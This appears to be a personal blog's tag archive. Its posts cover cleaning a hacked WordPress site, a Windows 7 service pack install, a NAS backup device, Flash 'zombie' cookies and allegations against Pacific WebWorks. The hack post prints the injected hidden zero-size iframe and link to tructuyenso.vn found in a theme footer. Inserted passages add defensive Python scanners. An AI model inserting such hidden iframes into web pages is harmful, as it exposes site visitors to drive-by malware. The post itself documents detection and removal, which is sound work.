Tag Archive: PC

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

# Apache 2.2 access control for requests arriving at this site: Allow rules are
# evaluated first, then Deny, so the Deny for 112.0.0.0/8 overrides "allow from all".
# <Limit> covers only the listed methods (HEAD is treated as GET); drop the
# <Limit> wrapper to apply the rule to every request method.
<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area) fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230…  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230 (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above.

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine… but to be sure, I downloaded a fresh copy of the theme and checked its footer file – it’s clean!  I then uploaded a whole clean Suffusion theme in its entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
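As an added example (my code, not the post’s or the Suffusion theme’s), here is a scanner that does mechanically what the source-view check above did by eye: it walks a theme directory for zero-size iframes and for links or scripts pointing at a host other than the site’s own. The sample footer and the site’s host list are constructed; against a live install you would call something like scan_theme("wp-content/themes/suffusion", {"strangelyperfect.tv"}) (assumed path).

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Constructed sample: the tail of a theme footer.php carrying the kind of
# injected link and zero-size iframe quoted in the post.
SAMPLE_FOOTER = (
    '<div id="footer"><?php wp_footer(); ?></div>\n'
    '<a href="http://tructuyenso.vn" title="Quang cao truc tuyen" > Quang cao truc tuyen</a>\n'
    '<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" '
    'nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>\n'
    '</body>\n</html>\n'
)

TAG_RE = re.compile(r'<(iframe|script|a)\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'([\w:-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s"\'>]+))')

def _attrs(raw):
    """Attribute string -> lower-cased dict; bare attributes (nosize) are ignored."""
    return {m.group(1).lower(): next(v for v in m.groups()[1:] if v is not None)
            for m in ATTR_RE.finditer(raw)}

def _is_hidden(attrs):
    """Zero-size or CSS-hidden: the usual shape of a drive-by iframe."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width") == "0" or attrs.get("height") == "0"
            or "display:none" in style or "visibility:hidden" in style)

def find_injections(html, own_hosts):
    """Return (line, kind, host) for hidden iframes and for iframe/script/a
    tags whose target host is outside own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), _attrs(m.group(2))
        url = attrs.get("href") if tag == "a" else attrs.get("src")
        host = (urlparse(url.strip()).hostname or "").lower() if url else ""
        line = html.count("\n", 0, m.start()) + 1
        if tag == "iframe" and _is_hidden(attrs):
            findings.append((line, "hidden_iframe", host))
        elif host and host not in own:
            findings.append((line, "external_" + tag, host))
    return findings

def scan_theme(theme_dir, own_hosts, suffixes=(".php", ".html", ".js")):
    """Walk a theme directory and map each file path to its findings."""
    report = {}
    for path in sorted(Path(theme_dir).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_injections(path.read_text(errors="replace"), own_hosts)
            if hits:
                report[str(path)] = hits
    return report
```

Run it on the downloaded copy of a theme, not just the live one, so a clean reference and the suspect copy can be diffed by their findings.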

A recheck on Sucuri shows my website to be okay now.  See screendump below.  I’ll be using Sucuri a lot more!

Sucuri Site Check

Windows 7 SP1 Install

Windows 7 Service Pack 1 Install Experience

Windows 7 Ultimate with SP1

I installed Win7 sp1 on my PC last night after spotting it in the Windows Update list.  It’s been out since 16 Feb 2011 but I’ve only just noticed!  That’s the state of my PC in the screenshot.

Hitches

Everything installed really well, actually.  The downloads and install took about an hour and included updates for the Microsoft Mouse I use.  After the SP1 had installed, a few more “optional” updates appeared, so in they went as well!  The whole thing was much better than some earlier Microsoft service pack installs on Windows XP and 95 that I’ve done!

Impressions

The PC actually feels as if it’s running better.  More stable, nicer window & application opening.

Next…?

My next task is to update the Win7 32-bit install that I run in a virtual environment.  See  .  Watch this space!

What is the Best Backup for Windows in a Small Home or Office?

Which Windows Backup?  A History.

Over the years I’ve tried many systems for backing up crucial Windows data.  Currently for small-scale backups I use the ubiquitous and almost bullet-proof flash drives, my current one tipping the scales at 8Gb.  But for major backups, as the years have passed, I’ve used:

  1. Floppy discs – 1.4Mb
  2. Iomega Zip discs – 100Mb
  3. CDRW – 650Mb
  4. DVD-R – 4.7Gb
  5. Western Digital My Book Home Edition – 1Tb

They all had their problems and limitations.  The last one looked good with Firewire, USB2, ethernet & eSATA connections – but it overheated and broke…

Best Windows Backup!

My current system is from Synology and is a “DS210j – Budget-friendly 2-bay NAS server for Home and Small Business”.

See: http://www.synology.com/enu/products/DS210j/index.php

I can heartily recommend the thing.  It has so much gubbins within it and far exceeds my limited expectations.  I installed two green 2Tb drives from Western Digital in mirrored RAID for security and use the auto-backup software provided as well as Windows’ own.  This is extremely relevant for the large number of hits I’ve had to this posting where a major part of the problem is the time taken to do a backup!  In my case, the 750Gb just takes a few hours to copy across the Gigabit speed ethernet that the unit can use.

Addendum June 2011: The tool is a seriously capable bit of kit and I cannot recommend it enough. Get one!

It does everything it says on the tin, and more!  The whole thing cost me about 200 quid, plus an hour of my time to install.

Even its firewall is more configurable than any router I’ve used!  It can be used as a server for FTP or the web.  It comes with software for a host of things that mimic Flickr etc but without all the privacy or security issues inherent in off-line storage.  It’ll also run with any operating system because it is itself a mini-Linux installation, and includes Windows, Apple and Linux applications.
Check it out, straight from their overview page:

Build Your Entertainment Center

Download Station 2 functions as a 24×7 BitTorrent, FTP, HTTP, eMule, and NZB download center. RapidShare and RSS download are now supported.

DLNA Compliant Media Server ensures compatibility and interoperability between Disk Station and a wide range of DLNA-certified home devices.

iTunes Server provides an easy way to share music and videos with other iTunes clients within the local network. You can create playlists with songs that match the criteria you specified, and best of all, iTunes will update these playlists automatically as you add or delete songs.

Audio Station supports music, Internet radio stations, and iPod playback with connected USB speakers. Web-streaming mode allows your music to be shared with multiple users over the Internet.

Back Up Your Precious Data

DSM 2.2 offers comprehensive solutions for you to back up data stored on Disk Station or your desktop computer to the Disk Station.

Server backup includes two alternatives: Network Backup and Local Backup. Both allow you to back up data in the shared folders and databases. Incremental backup option and flexible schedules are available. All can be easily configured with a step-by-step wizard.

Desktop backup provides Windows PC users with the Synology Data Replicator 3 for backing up desktop data, Outlook, and Outlook Express emails to their Disk Station by choosing one of the three backup modes: Immediate, Sync, and Scheduled backup, while Mac OS X users can use Apple Time Machine backup application to back up their critical data to Disk Station.

USBCopy allows you to quickly back up your data from a USB storage device such as a USB flash drive or USB card reader to the Disk Station with just one single touch on the front-panel Copy button.

Enrich Your Web Presence

Photo Station 3 simplifies photo, video, and blog sharing over the Internet. The flexibility of photo theme customization, blog layout arrangement, visitor’s privilege setting, RSS feed, and the dazzling 3-dimensional photo browsing with Cooliris make Photo Station 3 your state-of-the-art lifestyle sharing center on the Internet.

Web Station with built-in PHP+MySQL allows users to publish their own websites or install numerous popular open-source programs.

Access With Your iPhone/Mobile Device

The iPhone App DS audio allows Disk Station users to stream music stored on Disk Station with their iPhone/iPod® touch where Internet access is available, while DS photo allows uploading photos from the iPhone/iPod® touch to their Disk Station.

Users with a mobile device running on Windows Mobile® 6.0, iPhone OS 2.2.1 onward, or Symbian OS 9.1 can log on to their Disk Station to view photos with Mobile Photo Station and read supported file formats with Mobile File Station where Internet access is available.

Eco Friendly

Synology Disk Station is designed and developed perpetually with the concept of energy saving. Compared with average PC counterparts, Synology Disk Station consumes a relatively low amount of power and has the HDDs hibernate when not in use. This not only helps to save energy but also extends the lifespan of the hard disk.

Synology Disk Station truly earns the title of “green product” because of the unique Scheduled Power On/Off feature, and the smart fan design effectively cools down the system with minimum power consumption, yet keeps the system quiet on operation.

Finally, all Synology products are produced with RoHS compliant parts and packed with recyclable packing materials. Synology recognizes its responsibility as a global citizen and is continually working to reduce the environmental impact of the products we create.

Google and GMail use LSO Super Cookies

LSO Super Cookies?  Well, It Was News to Me!

In this article in “Windows Secrets” by Woody Leonhard, Eliminate Flash-spawned ‘zombie’ cookies, he describes how they are generated as un-deletable cookies by Flash applications, which compromises user privacy, in the sense that they do stuff to your hard disc and network without your permission!

So What I Did

…was to download and install the recommended Firefox add-on (Better Privacy) from here, https://addons.mozilla.org/en-US/firefox/addon/6623/

LSOs from Google being stored

I then deleted all of the hundreds of LSOs from my hard-drive!

Then I fired up Firefox.

I then clicked on a Google bookmark, went to GMail and then got prompted by the Better Privacy tool that THREE LSOs had been dumped on my hard drive!  (see screenshot).

And I always thought Google web pages used ordinary cookies…?  After all, where’s the Flash on a simple Google page?

After all, the actual technical name for this poop dust is a Flash-spawned ‘zombie’ cookie! This is live tracking of LSOs in the tool, and it seriously slowed down the PC, so I’ve turned it off now.
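As an added example (not code from the post or from the Better Privacy add-on), here is an on-demand inventory of LSOs grouped by the domain that wrote them, which gives the same per-domain picture as the add-on’s live tracking without leaving a monitor running. It assumes Flash Player’s usual Windows layout, %APPDATA%\Macromedia\Flash Player\#SharedObjects\<random id>\<domain>\…\*.sol; the sample tree with three Google entries is constructed, and demo() builds it in a temporary directory.

```python
import os
from collections import defaultdict
from pathlib import Path

SOL_MAGIC = b"\x00\xbf"   # first two bytes of every .sol file
SOL_TAG = b"TCSO"         # bytes 6..9 of the .sol header
FAKE_SOL = SOL_MAGIC + b"\x00\x00\x00\x1a" + SOL_TAG + b"\x00" * 20  # constructed 30-byte LSO

def default_root():
    """Flash Player's per-user LSO store on Windows (assumed layout)."""
    return Path(os.environ.get("APPDATA", "")) / "Macromedia" / "Flash Player" / "#SharedObjects"

def is_sol(path):
    """Header check so stray files are not counted as shared objects."""
    with open(path, "rb") as fh:
        head = fh.read(10)
    return head[:2] == SOL_MAGIC and head[6:10] == SOL_TAG

def inventory(root):
    """Map domain -> [(relative path, size)] for every valid .sol below root;
    the domain is the folder directly under the random per-profile id."""
    root, found = Path(root), defaultdict(list)
    for sol in sorted(root.rglob("*.sol")):
        parts = sol.relative_to(root).parts      # (random_id, domain, ..., file)
        if len(parts) < 3 or not is_sol(sol):
            continue
        found[parts[1].lower()].append(("/".join(parts[2:]), sol.stat().st_size))
    return dict(found)

def summarize(inv):
    """[(domain, count, total_bytes)], noisiest domains first."""
    rows = [(d, len(v), sum(size for _, size in v)) for d, v in inv.items()]
    return sorted(rows, key=lambda r: (-r[1], r[0]))

def build_sample(base):
    """Construct a tiny #SharedObjects tree: three Google LSOs, as in the
    post's screenshot, plus one stray file that is not a shared object."""
    files = {
        "ABC123XY/www.google.com/sess.sol": FAKE_SOL,
        "ABC123XY/www.google.com/prefs/ui.sol": FAKE_SOL,
        "ABC123XY/mail.google.com/flashmail.sol": FAKE_SOL,
        "ABC123XY/example.org/notes.sol": b"plain text, not an LSO",
    }
    for rel, data in files.items():
        path = Path(base) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(data)
    return Path(base)

def demo():
    """Build the constructed tree in a temp dir and return its summary;
    run summarize(inventory(default_root())) against a real profile."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        return summarize(inventory(build_sample(tmp)))
```

Running the inventory before and after visiting a single site shows exactly which domains wrote LSOs during that visit, the check the post did by hand with Better Privacy.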

What it Means

I think it’s time to look seriously at the problem, specifically things that Steve Jobs from Apple has been saying with regard to Adobe and their Flash application, Google and Microsoft.

In the past I’ve taken all his speeches with a pinch of salt because it always sounded like corporate jealousy and back-biting (his company being just as protectionist and restrictive as all the rest), but now it looks like he has a point.
The trouble is that the cat is already out of the bag and it looks like LSOs are being used as a lingering storage solution far removed from their Flash origins.

But what can I do?  After all,  I like using Google stuff!

What can YOU do?

Pacific Webworks, Lawyers and Social Networking

Introduction

The last thing we need is more scummy scammers and following on from Google’s legal action against Pacific Webworks (PWW) one would naively have thought that the “business” folk would be more circumspect.  (See previous article and comments, http://strangelyperfect.tv/5146/more-on-google-profits-and-pacific-webworks/ )

At the beginning of June, it appeared that the Google case against PWW had fallen flat and that PWW had gotten away with it.  This certainly appears so from yesterday’s press announcement by the odious PWW management, such as here.  It says,

SALT LAKE CITY, Jun 28, 2010 (BUSINESS WIRE) — Pacific WebWorks, Inc.  today announced that a Stipulated Final Judgment and Order for Permanent Injunction was entered in the U.S. District Court for the District of Utah in the Google, Inc. vs. Pacific WebWorks, Inc. matter.

CEO Ken Bell commented, “We are very pleased to have this behind us. We have devoted a great deal of time and energy to resolving this situation and are anxious to return to the business of growing our company responsibly and profitably through our new marketing program. We appreciate our shareholders’ patience and understanding as we deal with the many details involved in the development and marketing of our products to small business users.”

Quite Bad

This looks quite bad until you realise that the PWW share price and dealing volumes have both fallen!

So what does the market know about the “settlement” that we don’t, eh?

Bloosky.com and The lawyer

PWW and Bloosky were both named by Google, and Bloosky were (and still are) represented by Blair Jackson, who is a lawyer and on the company payroll of Bloosky in various positions.  (See at the bottom of here.)

On checking out Mr Jackson, he’s part of:

CHRISTIANSEN & JACKSON, P.C.
10421 S. Jordan Gateway, Suite 600
South Jordan, Utah 84095
Telephone 801.576.2662
Facsimile 801.415.9340
Attorneys for Defendant Bloosky Interactive, LLC

You can see this on some delaying action in the Google case by Jackson for Bloosky, documents here and here.  But it gets better…   In this document, you’ll see that Bloosky are suing someone called Daniel L. Balsam for not adhering to an earlier agreement not to disclose what was said… or something. (I’ve yet to check this through!  But it looks a bit like pot-kettle-black to me…)

Whatever.

socialtoolkit.com

Yes. Whatever.  A bit more fishing on Jackson took me to the website(s) of one Vernon Howard.

He was scammed by socialtoolkit.com, in exactly the same way as thousands of others were by Google Treasure Chest – promoted, run, designed and financed by Pacific Webworks.  It’s a scammers’ paradise with copious bad-web references and complaints.  The “business” says on its website,

Each day, more and more individuals, small business owners and Fortune 500 companies across the globe are realizing the value of SocialToolKit.com and choosing to increase their Social Networking efficiency, productivity and profits.   (Note to self:  “I must increase my Social Networking efficiency” – SP)

Here’s Vernon’s extremely well written story:

It’s an incredibly detailed tale, complete with copious screenshots, of his dealings with the various parties involved.  And he’s no shrinking violet.  He’s taking the buggers on!

There’s only one trouble.

He’s using Blair Jackson of Christiansen & Jackson, PC – Attorneys at Law, to take on socialtoolkit.com!!

How is this Weird?

Weird?  It’s positively scary!

Because if you read Vernon Howard’s account, you’ll see that he was billed by YourProfitGateway.com

YourProfitGateway.com, when you check its (now freely accessible) WHOIS, unsurprisingly redirects to http://www.visualwebtools.com/site/

visualwebtools.com

If you’ve been following this, you’ll know from a while back that Visual WebTools is owned and run by…….. (trumpet fanfare)

Pacific WebWorks!

Latest News from The Visual WebTools Camp

Pacific WebWorks Updates Marketing Efforts

Thursday June 24, 2010 11:52:01 EDT SALT LAKE CITY, Jun 24, 2010

Last Thursday, this is what the odious CEO Ken Bell of PWW said about his company, their marketing and their product, Visual WebTools.

Pacific WebWorks, Inc., www.pacificwebworks.com, (OTCBB:PWEB) announced today that the company continues to perfect their new marketing program which offers prospective customers the opportunity to receive a tutorial on the product and interact with the company during the buying process.

CEO Ken Bell stated,

“Visual WebTools continues to be one of the premier online software products for small businesses in the marketplace. We expect our new, more interactive marketing approach to result in a more informed buyer who will be better equipped to employ our technologies into their online business. As a result, we expect future revenues to be more stable. We anticipate revenues to accelerate during the second half of the year with continued profitability.”

Bell continued,

“During the first six months of 2010 (i.e. since Google sued them – SP) the company has focused on stabilizing profitability, servicing current customers and developing our new multi-tiered marketing program. We expect new customer acquisition in the future to be derived largely from our new direct contact marketing program. With our strong balance sheet, a current ratio in excess of 10x, tangible book value of nearly double our current market capitalization and strong historical earnings, we are positioned to continue to take advantage of opportunities in the marketplace.”

What are Google Doing?

The emphasis above is mine.  From it, you can clearly see that Bell claims that his company is responsible for all the things that lead up to the nefarious practices that then lead to people being scammed.

So is the Google thing over with yet?  Why haven’t the Salt Lake Tribune said anything about it yet?

I still think there’s more to come out with this.  Remember the falling share price of PWW?  The markets know, you know.

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me